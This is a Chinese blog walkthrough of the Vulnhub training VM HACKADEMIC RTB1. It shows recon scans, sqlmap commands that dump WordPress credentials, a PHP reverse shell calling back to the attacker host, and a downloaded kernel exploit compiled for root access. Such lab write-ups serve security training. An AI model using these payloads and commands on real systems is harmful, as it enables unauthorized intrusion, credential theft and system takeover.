当前位置:首页 >> 智能终端演进 >> 【Sword系列】Vulnhub靶机HACKADEMIC- RTB1 writeup,xperia t

【Sword系列】Vulnhub靶机HACKADEMIC- RTB1 writeup,xperia t

cpugpu芯片开发光刻机 智能终端演进 6
文件名:【Sword系列】Vulnhub靶机HACKADEMIC- RTB1 writeup,xperia t 【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup

靶机介绍 官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/ 需要读取靶机的root目录下key.txt 运行环境: 虚拟机网络设置的是NAT模式 靶机:IP地址:192.168.233.131 攻击机:kali linux,IP地址:192.168.233.129

信息收集

获取靶机IP地址

进入靶机

​​

用wappalyzer查看用到技术

查看开放的端口

扫敏感目录

nikto -h http://192.168.233.131dirb http://192.168.233.131/Hackademic_RTB1/gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html -u http://192.168.233.131

漏洞利用

web端寻找漏洞,php页面,f12代码注入,sql注入

sqlmap注入

sqlmap -u http://192.168.243.128/Hackademic_RTB1/?cat=1 --dbs --batch

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress --tables --batch

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users --columns --batch

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users -C user_login,user_pass --dump --batch

GeorgeMiller、q1w2e3登录

getshell

shell.php

<div><?php$sock = fsockopen('192.168.233.129','8888');$descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock);$peocess = proc_open('/bin/sh',$descriptorspec,$pipes);proc_close($process);?></div>

上传shell

kali打开监听

运行反弹shell

反弹shell成功

提权

找敏感信息

查权限文件

find / -user root -perm /4000 2>/dev/null根目录 用户权限set uid f文件类型,没有f会有目录

​搜索内核漏洞

searchsploit 2.6.31

下载到本地searchsploit -m 15285.c

​kali开启web服务器

在靶机中下载

wget http://192.168.233.129/15285.c

wget ip地址/文件名

编译脚本

gcc 15285.c -o exp

将编译的exp赋予执行权限并执行exp

提权成功id为0

协助本站SEO优化一下,谢谢!
关键词不能为空
同类推荐
«    2026年1月    »
1234
567891011
12131415161718
19202122232425
262728293031
控制面板
您好,欢迎到访网站!
  查看权限
网站分类
搜索
最新留言
文章归档
网站收藏
友情链接